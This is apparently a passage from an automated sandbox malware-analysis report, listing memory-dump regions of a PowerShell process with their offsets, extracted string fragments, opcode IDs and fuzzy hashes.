                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$4'eq$4sl$x.gk
                                                                                            • API String ID: 0-659791527
                                                                                            • Opcode ID: 263b4f099691a80434f902a5579e5a4111226d7dd2929a98d717273b7ff05af4
                                                                                            • Instruction ID: 41dce99fde7b66462c4475d23a12e2b239e635feea09cf6584e8ec950ead36ba
                                                                                            • Opcode Fuzzy Hash: 263b4f099691a80434f902a5579e5a4111226d7dd2929a98d717273b7ff05af4
                                                                                            • Instruction Fuzzy Hash: 20124EF4A00215DFDB64CB18C991BAABBB2FB95304F10C1D9D909AB751CB32AE85CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$4'eq$4sl$x.gk
                                                                                            • API String ID: 0-659791527
                                                                                            • Opcode ID: feee197fd509269597a033ef832ed67c2a0a75f2445aa7ec235cbf7150db9884
                                                                                            • Instruction ID: f29bedcd6b83a684415b5646bfed2d793f9b9a21ce024a93268e8d33c4642f05
                                                                                            • Opcode Fuzzy Hash: feee197fd509269597a033ef832ed67c2a0a75f2445aa7ec235cbf7150db9884
                                                                                            • Instruction Fuzzy Hash: 9FE15EF4A00215DFDB64CB28C991B9ABBB2FB95304F1081D9D90DAB751CB32AE85CF51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1873619579
                                                                                            • Opcode ID: cbf90dcabbb61d1870a4b95a3ec510225f7da1591f3890be0e9468382d166e03
                                                                                            • Instruction ID: 748b4b891659efaea00c919546486966191a6388f260e3fccfc6379cb41a7204
                                                                                            • Opcode Fuzzy Hash: cbf90dcabbb61d1870a4b95a3ec510225f7da1591f3890be0e9468382d166e03
                                                                                            • Instruction Fuzzy Hash: BD5250B4B002159FD724DF18C991B5ABBB2EB84304F14C099DA09AF752DB72EE85CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1873619579
                                                                                            • Opcode ID: 75d43c16fae0c98219cd0c1dc9f0d10d47fd5114aea45209f666d73b3b52065c
                                                                                            • Instruction ID: e43fad6e148350b76fe4f495d22e0cf2ae230ded08004d2e90225c690054951e
                                                                                            • Opcode Fuzzy Hash: 75d43c16fae0c98219cd0c1dc9f0d10d47fd5114aea45209f666d73b3b52065c
                                                                                            • Instruction Fuzzy Hash: 2B4251F4B002149FDB24DB18CD51BAABBB2EB95304F108099DA099F751CB72EE858F91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1873619579
                                                                                            • Opcode ID: 05af52434df1350201365edd664dc582fefb1de8743562f2d0c187991c159284
                                                                                            • Instruction ID: 86bd208fe5c5ff44e8bdc7fdf6bbba0f26463b91724390b53bea1428c608c4c9
                                                                                            • Opcode Fuzzy Hash: 05af52434df1350201365edd664dc582fefb1de8743562f2d0c187991c159284
                                                                                            • Instruction Fuzzy Hash: 78224EB4A002159FD724DF18C991B5ABBB2EB84304F10C099DA09AF752DB76EE85CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$x.gk$-gk
                                                                                            • API String ID: 0-1873619579
                                                                                            • Opcode ID: abf244f487e557567449105f336f42e3578b8d05d5629772586150803c8031be
                                                                                            • Instruction ID: 7ce7e89559250c654035f610ee17f7c1010df2eece87b5e77930cebfe0c93a8b
                                                                                            • Opcode Fuzzy Hash: abf244f487e557567449105f336f42e3578b8d05d5629772586150803c8031be
                                                                                            • Instruction Fuzzy Hash: F11241F4B002149FDB24DF58CD51BAABBB2EB95304F108099DA099F751CB72EE858F91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $eq$$eq$$eq
                                                                                            • API String ID: 0-177832560
                                                                                            • Opcode ID: 7b35fb399fb730895245c343f7e15e4b561446a816a12c1854f869e2bbff9d6d
                                                                                            • Instruction ID: 6bde8f1bfcd6b34b548ebaa32f9eea787b02f0575e3cfe0f025c47a33d0f0264
                                                                                            • Opcode Fuzzy Hash: 7b35fb399fb730895245c343f7e15e4b561446a816a12c1854f869e2bbff9d6d
                                                                                            • Instruction Fuzzy Hash: 43412BF2B001669BCB64DE69E84026FFBB5AF85310B14C56EC815EB345DB32DA11C7E2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $eq$$eq$$eq
                                                                                            • API String ID: 0-177832560
                                                                                            • Opcode ID: 537ba9ddfe99cdcf0f35f1bc1202893c36a19cb9e15f8b6f4c6691ed24d13838
                                                                                            • Instruction ID: 4bd94e3a3c94acd2cff6a1dc740d006b49a6bc2f0de888d0c296d68e1efa90b6
                                                                                            • Opcode Fuzzy Hash: 537ba9ddfe99cdcf0f35f1bc1202893c36a19cb9e15f8b6f4c6691ed24d13838
                                                                                            • Instruction Fuzzy Hash: D02147B27102869BDB38D96A9860B27BF969BC1315F34C02EEA05CF681DD35CB418361
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$$eq$$eq
                                                                                            • API String ID: 0-3012014280
                                                                                            • Opcode ID: b8d32f17c731e4d96db0fbba32a9d1898314d4de02495eba1fc1b109fdd12ff9
                                                                                            • Instruction ID: 3d700d22c363311dcc036176a556ee4cbbe2ee1f419d125814e733c5594eb90d
                                                                                            • Opcode Fuzzy Hash: b8d32f17c731e4d96db0fbba32a9d1898314d4de02495eba1fc1b109fdd12ff9
                                                                                            • Instruction Fuzzy Hash: 4421B231A00205DFDB34CF69D580B66B7B9BF44B61F08817AEC2987159E735D844CBAA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl
                                                                                            • API String ID: 0-433520029
                                                                                            • Opcode ID: cb9c7b8e94af8b8e5a592f646437627f35770e74f87ac45637fc66c2f088e7a2
                                                                                            • Instruction ID: a20ea467fed76c1046b9897c3073908f3e6e61f19d854c23b95f8c1d8a377360
                                                                                            • Opcode Fuzzy Hash: cb9c7b8e94af8b8e5a592f646437627f35770e74f87ac45637fc66c2f088e7a2
                                                                                            • Instruction Fuzzy Hash: 5E919DF4A00205DFCB14DF69C591BAABBF2EF88314F148069D905AB755CB32EE45CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $eq$$eq
                                                                                            • API String ID: 0-2246304398
                                                                                            • Opcode ID: 71572e4125b2cca74bcb65ad76b53a99ed4ac654579bdf14e53a1a1fb6800ba8
                                                                                            • Instruction ID: 8cd9777121e8cc6018b8d73986fef2f049a2a45833c4f6197a71b669289dd6fd
                                                                                            • Opcode Fuzzy Hash: 71572e4125b2cca74bcb65ad76b53a99ed4ac654579bdf14e53a1a1fb6800ba8
                                                                                            • Instruction Fuzzy Hash: 75110AF26083C69BDB39C96698607227FA54F82710F38C05FEA45CF586D5258B548372
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl
                                                                                            • API String ID: 0-905518172
                                                                                            • Opcode ID: 76981e4f193f83e8ac8f0d302eb3fddd5c4ffa95a03880c647c922d4843da459
                                                                                            • Instruction ID: 3220503c137d5aa36de377fde024e6c481cdd9773bd99b8d5f2019fd7eac790e
                                                                                            • Opcode Fuzzy Hash: 76981e4f193f83e8ac8f0d302eb3fddd5c4ffa95a03880c647c922d4843da459
                                                                                            • Instruction Fuzzy Hash: 56918DF4A00205DFCB14DF59C590B9ABBF2BF89314F1880A9D905AB751CB72EE45CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl
                                                                                            • API String ID: 0-905518172
                                                                                            • Opcode ID: 484383dcfffc9df2ce8cdb379974ea4f8f954107f4f391cde8a208db6b91cc6d
                                                                                            • Instruction ID: d27a02973aa8362e628f578f910f15d529ed4b0ee3f419d5ff6ffbaa3344b606
                                                                                            • Opcode Fuzzy Hash: 484383dcfffc9df2ce8cdb379974ea4f8f954107f4f391cde8a208db6b91cc6d
                                                                                            • Instruction Fuzzy Hash: 1F819C74A00214DFCB14CF98C580EAABBB6EF88714F19C069E905AB711C772ED81CB61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: x.gk
                                                                                            • API String ID: 0-1304459573
                                                                                            • Opcode ID: 04ee1084c91b112d6d041ff839d91a251c5cf2d122b3997d1a3ba232d51c5cbd
                                                                                            • Instruction ID: 9cc5611d21fc2250215f40be7e730ce155e3bc89e975cecd74e44d15b838a59c
                                                                                            • Opcode Fuzzy Hash: 04ee1084c91b112d6d041ff839d91a251c5cf2d122b3997d1a3ba232d51c5cbd
                                                                                            • Instruction Fuzzy Hash: 323173B4B00204ABD714AF64C851FAFBAE3DF85344F50C028EA05AF795CF76AD468B91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq
                                                                                            • API String ID: 0-1552367303
                                                                                            • Opcode ID: 63c17feadbb8810ed9641721f0c39cb94803ae70fa1de54551c28ceb0dddcd1f
                                                                                            • Instruction ID: 5d87730bff03de63ee328aca08f315a05da1a504ba2590e997fce96564f4b2b1
                                                                                            • Opcode Fuzzy Hash: 63c17feadbb8810ed9641721f0c39cb94803ae70fa1de54551c28ceb0dddcd1f
                                                                                            • Instruction Fuzzy Hash: D7212471B00330DBDB249F75890133B76AAAB81B90F150026EA05DB6A1EB39CAC1C7E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617391773.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a20000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ea94a09540907329868b9d9635ad37b0998e8f1ef331b62e8516ab317e6c2cff
                                                                                            • Instruction ID: 1bd55a49f4869d2d39297c3611ee4f15ec2b2858153ac321d91c04014c7940e6
                                                                                            • Opcode Fuzzy Hash: ea94a09540907329868b9d9635ad37b0998e8f1ef331b62e8516ab317e6c2cff
                                                                                            • Instruction Fuzzy Hash: A9021874A002199FCB05CF9CD884AAEBBF6FF88710F258159E915AB365D731ED81CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617391773.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a20000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 535a77d62cd881ee1e72a3e053b270d26afb66581f0d36017f34aea560be780c
                                                                                            • Instruction ID: a3aad5a520b33ef52ba84a54b324d05923fe57c508299f0f148c4f9f2a4b4f59
                                                                                            • Opcode Fuzzy Hash: 535a77d62cd881ee1e72a3e053b270d26afb66581f0d36017f34aea560be780c
                                                                                            • Instruction Fuzzy Hash: 48022F75A01219DFCB09CF9CD484AAEBBB6FF88710F248159E815AB365C735ED81CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617391773.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a20000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: febf52e596f467137a4559e1b33fd69969bcdf7c5711616bb89c57d56e1039e1
                                                                                            • Instruction ID: ee0ff3f5b975b644cc709b9b9feb2d4cabd6c480f634a9ecc60465c487a8ff0b
                                                                                            • Opcode Fuzzy Hash: febf52e596f467137a4559e1b33fd69969bcdf7c5711616bb89c57d56e1039e1
                                                                                            • Instruction Fuzzy Hash: 91022B74A052199FCB15CF9CD884AAEBBF2FF88710F648159E805AB365D731ED81CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fca40ae1431008929180f758047ef20add0498feb4e81d7c19fc63197379c185
                                                                                            • Instruction ID: 433e8df8aacca7adcaa3f6ef524fec1f6f1cfca1d001094ce5a17a1d00111fa5
                                                                                            • Opcode Fuzzy Hash: fca40ae1431008929180f758047ef20add0498feb4e81d7c19fc63197379c185
                                                                                            • Instruction Fuzzy Hash: 53F1B1F4B012459FCB18CB99C5A1EAABBB2EF85314F14C059E9059F356CB32EE41CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73c26d188f135ba1830f83c2d29ad598a99b888992a7d77f451840e105aab352
                                                                                            • Instruction ID: 60d751d9a37be31bbba4055607e7fc4ae86235e2452ed818b61733bde280bde3
                                                                                            • Opcode Fuzzy Hash: 73c26d188f135ba1830f83c2d29ad598a99b888992a7d77f451840e105aab352
                                                                                            • Instruction Fuzzy Hash: C2C1A535A00208DFDB24EFA5D548AADBBB2FF84314F218559E4069B3A5CB35ED49CF80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617391773.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a20000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6f93538b6722dd6e4faf91efcd82063ccc82888e400c7ac6a3473c4013589569
                                                                                            • Instruction ID: b6db63619bed6df3e94ab86bfd8dd8feec5c907aac19b093fe2b00fab9b955e8
                                                                                            • Opcode Fuzzy Hash: 6f93538b6722dd6e4faf91efcd82063ccc82888e400c7ac6a3473c4013589569
                                                                                            • Instruction Fuzzy Hash: DB819070B006298FDB05DF69D950AAEB7F6FF88300F548569E8059B365DB34AD42CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 335030488a4034f2e6c7945a87d4aae97ac9b059a4ea30af907ee5c0b289b6cc
                                                                                            • Instruction ID: d9d29d9266a517387958b213f2affd7c78402e02dd74ac635ef37a18509b2ddc
                                                                                            • Opcode Fuzzy Hash: 335030488a4034f2e6c7945a87d4aae97ac9b059a4ea30af907ee5c0b289b6cc
                                                                                            • Instruction Fuzzy Hash: 32918B74A042059FCB16CF98C4D49BEBBB1FF48310B288699D865AB3A5C735EC51CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c10e5742bc25c1af55e46e00277a7db5551b0e4499fe6f44211389b35e70311
                                                                                            • Instruction ID: 5e2d36b683b07e54b2006c3be79f104bf04fd492214d29dd58eb911d4004efff
                                                                                            • Opcode Fuzzy Hash: 9c10e5742bc25c1af55e46e00277a7db5551b0e4499fe6f44211389b35e70311
                                                                                            • Instruction Fuzzy Hash: CFF090763001108BCF196B28E06843E77A7EFC96223A0445EE806CB352DF749C068791
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2607619071.0000000004CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CAD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4cad000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a32da0301de3a78a9ec3d1949d40ed91b6a28b43a3dbd331e1ccc8c5108da6ec
                                                                                            • Instruction ID: b27a2af260012ab2dbd94bc6709c7efa123c0a4d414a8c8474723aaedd0cfc06
                                                                                            • Opcode Fuzzy Hash: a32da0301de3a78a9ec3d1949d40ed91b6a28b43a3dbd331e1ccc8c5108da6ec
                                                                                            • Instruction Fuzzy Hash: 42F0C272004344AEE7108E15D9C8B66FFD8EB52738F18C05AED494E686C679A880CAB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617391773.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a20000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 36236debca5ccfadbaaf4047d8450f0ff6b4352e9417194de990a5053d4dd88a
                                                                                            • Instruction ID: c88d7f6df068fcd446bd9e4def01415a3cb1d3ea771cf307f77fe657fcce951c
                                                                                            • Opcode Fuzzy Hash: 36236debca5ccfadbaaf4047d8450f0ff6b4352e9417194de990a5053d4dd88a
                                                                                            • Instruction Fuzzy Hash: 38F0F935A00519AFCB15DF88D9409ADFB76FF88320B648159E514A72A0C7329D62DB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b646f378c51603c9d44a70c01b9b678ec100360e24a6e4d1191b7a949e404ce2
                                                                                            • Instruction ID: e02307f500c9ba946e1f42fe38f40fec147b04b69a071db24fdb2727b5789ad0
                                                                                            • Opcode Fuzzy Hash: b646f378c51603c9d44a70c01b9b678ec100360e24a6e4d1191b7a949e404ce2
                                                                                            • Instruction Fuzzy Hash: EFF01C706006069BEB14EBA4D555B6E7BB2EF80304F204814E5029F395CB79A9459F80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a52fbfb9e7857aed094d7ccae01fa928fd97a134c3814687bab74e1235329cad
                                                                                            • Instruction ID: 98fa023762a622906bea6b986b9b0fbbf996dc0f18320cabacd145490156e30c
                                                                                            • Opcode Fuzzy Hash: a52fbfb9e7857aed094d7ccae01fa928fd97a134c3814687bab74e1235329cad
                                                                                            • Instruction Fuzzy Hash: 3FE0ED74D042499FC755DFA884815A9BFF4AF19210B1085EEC95CDB222E6314652CBD5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                            • Instruction ID: f783109f5126caf99db402308033f5c95edf55478d3496edbd8e4108bdd0a7d4
                                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                            • Instruction Fuzzy Hash: E3D067B0D042099F8794EFADC94156EFBF4EB59200F6085AE8919E7301E7329A528FD1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$84tl$84tl$84tl$84tl$tPeq$tPeq$tPeq$tPeq$(kq$(kq$(kq$(kq
                                                                                            • API String ID: 0-1458600383
                                                                                            • Opcode ID: 996e17812a1e8b74369ceea79e1cf02ca42d6afa77ffb440c94c20b59019fd31
                                                                                            • Instruction ID: 1a3d242175d1e3ed4e6dbc2e3bf7cd9f2e941a26011a5f178d72a53bf773aaf5
                                                                                            • Opcode Fuzzy Hash: 996e17812a1e8b74369ceea79e1cf02ca42d6afa77ffb440c94c20b59019fd31
                                                                                            • Instruction Fuzzy Hash: 2361D8B1B101559FCB24DF59C540AAABBE2FF8A310F29809DE905AF385CB31DD41C7A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$tPeq$tPeq$#fk$$eq$$eq$$eq$ll$ll
                                                                                            • API String ID: 0-4217054718
                                                                                            • Opcode ID: d63c0af68391b5b4323fa99dcd64984c46e37140e65ed3777e51abc0dca94e6c
                                                                                            • Instruction ID: 0793da82dbcc4f1bef7447f13ce4f6e631d02bb7d64ff874b510232345691add
                                                                                            • Opcode Fuzzy Hash: d63c0af68391b5b4323fa99dcd64984c46e37140e65ed3777e51abc0dca94e6c
                                                                                            • Instruction Fuzzy Hash: D9A129B2704256CFCB15CA7A885177ABBA1EFC2210B1880AFD945CB692DA35C985C7A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$84tl$84tl$tPeq$tPeq$$eq$$eq$$eq
                                                                                            • API String ID: 0-1643725282
                                                                                            • Opcode ID: 9370ceef29a28b8ecca03104914804d850bf455a5338faf41b16ad8e3c41c1d5
                                                                                            • Instruction ID: 9c7dccf6a59db95a95d33ad2117f0410891afcd2adb9acd9484ab9fd1228e061
                                                                                            • Opcode Fuzzy Hash: 9370ceef29a28b8ecca03104914804d850bf455a5338faf41b16ad8e3c41c1d5
                                                                                            • Instruction Fuzzy Hash: C4D1D331B002149FCB15DFA8C85176ABBB6EFC8750F24846AEE159B391DB31DD41C7A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$84tl$84tl$tPeq$tPeq$tPeq$tPeq
                                                                                            • API String ID: 0-1039696944
                                                                                            • Opcode ID: 978d2a0a728931328dcd41f1cc9e5632ed8b81dcda03965a0cae4ed56b61a89c
                                                                                            • Instruction ID: e76f6ddab9c487c2ca61679565473d9b99b7a15b2e635f04f2a7c98728d198b0
                                                                                            • Opcode Fuzzy Hash: 978d2a0a728931328dcd41f1cc9e5632ed8b81dcda03965a0cae4ed56b61a89c
                                                                                            • Instruction Fuzzy Hash: 0EC1AB31B002199FCF159F58C440AAABBA6FF88760F288469FD159B395CB31DD51CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$84tl$84tl$tPeq$tPeq$tPeq$tPeq
